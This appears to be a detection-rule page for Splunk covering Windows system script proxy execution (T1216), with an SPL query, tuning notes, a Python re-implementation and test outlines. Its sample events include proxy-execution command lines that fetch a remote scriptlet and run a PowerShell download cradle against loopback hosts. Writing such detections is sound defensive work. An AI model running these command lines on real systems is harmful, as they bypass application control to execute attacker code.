Detect System Script Proxy Execution in Splunk
Adversaries may use trusted scripts, often signed with Microsoft certificates, to proxy the execution of malicious files. Several Microsoft-signed scripts that ship with Windows or are downloadable from Microsoft can be abused to proxy execution of attacker-controlled content. Primary sub-techniques include PubPrn.vbs (a printer publishing script that accepts a 'script:' COM scriptlet URL as its second argument) and SyncAppvPublishingServer.vbs/exe (an App-V publishing script that passes arguments directly to a PowerShell pipeline). Because these scripts are signed by Microsoft, they may bypass application control policies (AppLocker, WDAC) that trust Microsoft-signed content, and they evade script-based detection that focuses on unsigned or unknown interpreters. The technique falls under Defense Evasion, making it a common component of initial access payloads and post-exploitation tooling.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1216 System Script Proxy Execution
- Canonical reference
- https://attack.mitre.org/techniques/T1216/
SPL Detection Query
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(
(Image="*\\cscript.exe" OR Image="*\\wscript.exe")
AND (CommandLine="*pubprn.vbs*" OR CommandLine="*syncappvpublishingserver.vbs*")
)
OR
(
Image="*\\syncappvpublishingserver.exe"
AND (
CommandLine="*Start-Process*" OR CommandLine="*Invoke-Expression*" OR
CommandLine="*IEX*" OR CommandLine="*Net.WebClient*" OR
CommandLine="*DownloadString*" OR CommandLine="*-enc*" OR
CommandLine="*-EncodedCommand*" OR CommandLine="*cmd.exe*"
)
)
| eval ProxyScript=case(
match(lower(CommandLine), "pubprn\.vbs"), "PubPrn",
match(lower(CommandLine), "syncappvpublishingserver\.vbs"), "SyncAppvPublishingServer.vbs",
match(lower(Image), "syncappvpublishingserver\.exe"), "SyncAppvPublishingServer.exe",
true(), "Unknown"
)
| eval ScriptletExec=if(match(lower(CommandLine), "(script:|scrobj\.dll|scriptlet)"), 1, 0)
| eval RemoteURL=if(match(CommandLine, "https?://"), replace(CommandLine, ".*(https?://[^\s'\"]+).*", "\1"), "none")
| eval SuspicionScore=0
| eval SuspicionScore=SuspicionScore + if(ScriptletExec=1, 3, 0)
| eval SuspicionScore=SuspicionScore + if(match(lower(CommandLine), "https?://"), 2, 0)
| eval SuspicionScore=SuspicionScore + if(match(lower(CommandLine), "(invoke-expression|iex|downloadstring|net\.webclient|-encodedcommand)"), 2, 0)
| eval SuspicionScore=SuspicionScore + if(NOT match(lower(ParentImage), "(explorer\.exe|services\.exe|svchost\.exe|msiexec\.exe)"), 1, 0)
| where SuspicionScore > 0
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, ProxyScript, ScriptletExec, RemoteURL, SuspicionScore
| sort - _time

Detects System Script Proxy Execution via Sysmon Event ID 1. Matches cscript/wscript executing PubPrn.vbs or SyncAppvPublishingServer.vbs, and SyncAppvPublishingServer.exe invoked with PowerShell-style arguments. Assigns a suspicion score based on scriptlet protocol usage (+3), remote URLs (+2), PowerShell download cradle patterns (+2), and unexpected parent processes (+1). Higher scores indicate higher-confidence malicious proxy execution versus legitimate administrative use.
Data Sources
Required Sourcetypes
False Positives & Tuning
- Legitimate printer publishing operations using PubPrn.vbs invoked against internal print server IP addresses (not remote HTTP URLs) — verify second argument is a UNC path or IP, not a 'script:' URL
- App-V publishing refresh jobs running SyncAppvPublishingServer.vbs on schedule — confirm parent is taskeng.exe or svchost.exe for the Task Scheduler service with a known task name
- IT automation or MDM deployment scripts that invoke Microsoft-signed VBScripts via cscript during software packaging — parent process will typically be msiexec.exe, ccmexec.exe, or a vendor installer
- Security product health checks or compliance scanners that enumerate signed scripts by executing them with benign arguments
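As an added example (not part of this page and not Splunk's or Sysmon's own code), the following Python re-implements the SPL query's base filter, ProxyScript classification, scriptlet check, URL extraction and SuspicionScore arithmetic, and runs it over constructed Sysmon Event ID 1 records that mirror the four test scenarios plus two benign cases from the tuning notes (a PubPrn.vbs call whose second argument is an LDAP path rather than a script: URL, and a scheduled App-V refresh parented by svchost.exe). The `SysmonProcessCreate` class, function names, file paths, hostnames and URLs are all constructed for this illustration.

```python
import re
from dataclasses import dataclass

# Regexes mirror the match() expressions in the SPL query above.
SCRIPTLET_RE = re.compile(r"(script:|scrobj\.dll|scriptlet)")
URL_RE = re.compile(r"(https?://[^\s'\"]+)")
CRADLE_RE = re.compile(r"(invoke-expression|iex|downloadstring|net\.webclient|-encodedcommand)")
EXPECTED_PARENT_RE = re.compile(r"(explorer\.exe|services\.exe|svchost\.exe|msiexec\.exe)")
# Argument patterns the base search requires for a SyncAppvPublishingServer.exe hit;
# "-enc" also covers "-EncodedCommand" as a substring, like the SPL wildcard.
PS_ARGS_RE = re.compile(r"(start-process|invoke-expression|iex|net\.webclient|downloadstring|-enc|cmd\.exe)")


@dataclass
class SysmonProcessCreate:
    """Minimal stand-in (hypothetical) for the fields of a Sysmon Event ID 1 record."""
    image: str
    command_line: str
    parent_image: str


def in_scope(ev: SysmonProcessCreate) -> bool:
    """Replicates the base search (everything before the first eval)."""
    img = ev.image.lower()
    cl = ev.command_line.lower()
    if img.endswith(("\\cscript.exe", "\\wscript.exe")):
        return "pubprn.vbs" in cl or "syncappvpublishingserver.vbs" in cl
    if img.endswith("\\syncappvpublishingserver.exe"):
        return PS_ARGS_RE.search(cl) is not None
    return False


def evaluate(ev: SysmonProcessCreate) -> dict:
    """Replicates the eval pipeline: ProxyScript, ScriptletExec, RemoteURL, SuspicionScore."""
    cl = ev.command_line.lower()
    if "pubprn.vbs" in cl:
        proxy = "PubPrn"
    elif "syncappvpublishingserver.vbs" in cl:
        proxy = "SyncAppvPublishingServer.vbs"
    elif "syncappvpublishingserver.exe" in ev.image.lower():
        proxy = "SyncAppvPublishingServer.exe"
    else:
        proxy = "Unknown"
    scriptlet = 1 if SCRIPTLET_RE.search(cl) else 0
    url_match = URL_RE.search(ev.command_line)  # case-sensitive, as in the query
    remote_url = url_match.group(1) if url_match else "none"
    score = 0
    score += 3 if scriptlet else 0                                   # scriptlet protocol
    score += 2 if re.search(r"https?://", cl) else 0                 # remote URL
    score += 2 if CRADLE_RE.search(cl) else 0                        # download cradle
    score += 1 if not EXPECTED_PARENT_RE.search(ev.parent_image.lower()) else 0  # odd parent
    return {"ProxyScript": proxy, "ScriptletExec": scriptlet,
            "RemoteURL": remote_url, "SuspicionScore": score}


def run_detection(events):
    """Base search + eval pipeline + `where SuspicionScore > 0`, in input order."""
    rows = []
    for ev in events:
        if not in_scope(ev):
            continue
        row = evaluate(ev)
        if row["SuspicionScore"] > 0:
            rows.append(row)
    return rows


# Constructed sample events: indexes 0-3 mirror Tests 1-4, 4-5 are benign cases
# from the tuning notes, 6 is out of scope for the base search entirely.
SAMPLE_EVENTS = [
    SysmonProcessCreate(r"C:\Windows\System32\cscript.exe",
        r"cscript.exe C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http://127.0.0.1:8080/test.sct",
        r"C:\Windows\System32\cmd.exe"),
    SysmonProcessCreate(r"C:\Windows\System32\cscript.exe",
        r'cscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; Write-Output t1216 > %TEMP%\t1216-test.txt"',
        r"C:\Windows\System32\cmd.exe"),
    SysmonProcessCreate(r"C:\Windows\System32\SyncAppvPublishingServer.exe",
        'C:\\Windows\\System32\\SyncAppvPublishingServer.exe "n; Invoke-Expression (New-Object Net.WebClient).DownloadString(\'http://127.0.0.1:9090/t\')"',
        r"C:\Windows\System32\cmd.exe"),
    SysmonProcessCreate(r"C:\Windows\System32\cscript.exe",
        r"cscript.exe C:\Users\alice\AppData\Local\Temp\pubprn.vbs 127.0.0.1 script:http://127.0.0.1:8080/test.sct",
        r"C:\Windows\explorer.exe"),
    SysmonProcessCreate(r"C:\Windows\System32\cscript.exe",
        r'cscript.exe C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs printsrv01 "LDAP://CN=Container,DC=example,DC=com"',
        r"C:\Windows\explorer.exe"),
    SysmonProcessCreate(r"C:\Windows\System32\cscript.exe",
        r'cscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n"',
        r"C:\Windows\System32\svchost.exe"),
    SysmonProcessCreate(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -NoProfile -Command Get-Date",
        r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print(row)
```

Running the block prints four rows (scores 6, 1, 5, 5); the two benign events score 0 and are dropped by the `where` clause, which is exactly the tuning behaviour the bullets above describe. Note that Test 2 only scores 1 (unexpected parent): a SyncAppvPublishingServer.vbs injection that avoids URLs and cradle keywords, run from an expected parent, would score 0, so environments that never run App-V may want to alert on any hit for that script regardless of score.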
Other platforms for T1216
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: PubPrn.vbs Scriptlet Execution via script: Protocol
Expected signal: Sysmon Event ID 1: Process Create with Image=cscript.exe, CommandLine containing 'pubprn.vbs' and 'script:http://127.0.0.1'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:8080 from cscript.exe. Security Event ID 4688 if command line auditing is enabled.
- Test 2: SyncAppvPublishingServer.vbs PowerShell Pipeline Injection
Expected signal: Sysmon Event ID 1: cscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs' and 'Write-Output'. Child process Sysmon Event ID 1: powershell.exe spawned by cscript.exe executing the injected command. Sysmon Event ID 11: File Create for t1216-test.txt in %TEMP%.
- Test 3: SyncAppvPublishingServer.exe Direct Invocation with PowerShell Download Cradle
Expected signal: Sysmon Event ID 1: SyncAppvPublishingServer.exe with CommandLine containing 'Invoke-Expression' and 'Net.WebClient'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:9090. Security Event ID 4688 with full command line.
- Test 4: PubPrn.vbs Used from Non-Standard Location (Bypass Detection by Path)
Expected signal: Sysmon Event ID 11: File Create for pubprn.vbs in %TEMP% (potential staging artifact). Sysmon Event ID 1: cscript.exe with CommandLine referencing %TEMP%\pubprn.vbs and the 'script:' URL. Sysmon Event ID 3: Network Connection attempt from cscript.exe.
References (10)
- https://attack.mitre.org/techniques/T1216/
- https://attack.mitre.org/techniques/T1216/001/
- https://attack.mitre.org/techniques/T1216/002/
- https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Pubprn.yml
- https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSScripts/Syncappvpublishingserver.yml
- https://github.com/api0cradle/UltimateAppLockerByPassList
- https://github.com/tyranid/DotNetToJScript
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/applocker-overview
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.002/T1216.002.md